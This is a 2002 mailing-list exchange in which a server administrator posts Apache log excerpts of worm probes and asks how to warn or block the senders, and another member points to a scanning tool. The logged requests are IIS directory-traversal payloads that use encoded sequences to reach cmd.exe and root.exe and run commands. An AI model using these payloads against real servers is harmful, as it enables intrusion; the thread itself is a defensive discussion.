[Techtalk] outlook virii

FerrariGirl FerrariGirl at yahoo.com
Sat Apr 13 09:30:51 EST 2002 

There is a program called codeblue that is out there that will scan your 
apache logs and then send an email to the offending server that they are 
infected.  This works on CodeRed, CodeRedII, and Nimda.  Or if you 
really don't want it.. you can forward the request to say 
support.microsoft.com

Davis, Jennifer wrote:

>Hi:
>
>	I was wondering if it was possible to send some sort of message back
>to people. (like maybe a popup message) when they hit my webserver that
>surfing with viruses on their system is just not cool  See an except from my
>log below.  I estimate that 95% of the hits to my web server are these
>exploit attempts.  Barring that is there a way to block an IP that we'll say
>is looking for root.exe?  The weserver is a standard Apache 1.3?  that came
>with Slackware 8.0.
>
>Thanks again
>Jenn
>
>Jennifer Davis
>Constitutional & Administrative Law - Droit administratif & constitutionnel
>Department of Justice Canada - Ministère de la Justice du Canada
>*(613) 957-4963 - fx (613) 941-1937
>*jdavis at justice.gc.ca
>
>64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
>stem32/cmd.exe?/c+dir HTTP$
>64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
>64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
>64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>
>
>
>
>_______________________________________________
>Techtalk mailing list
>Techtalk at linuxchix.org
>http://mailman.linuxchix.org/mailman/listinfo/techtalk
>

More information about the Techtalk mailing list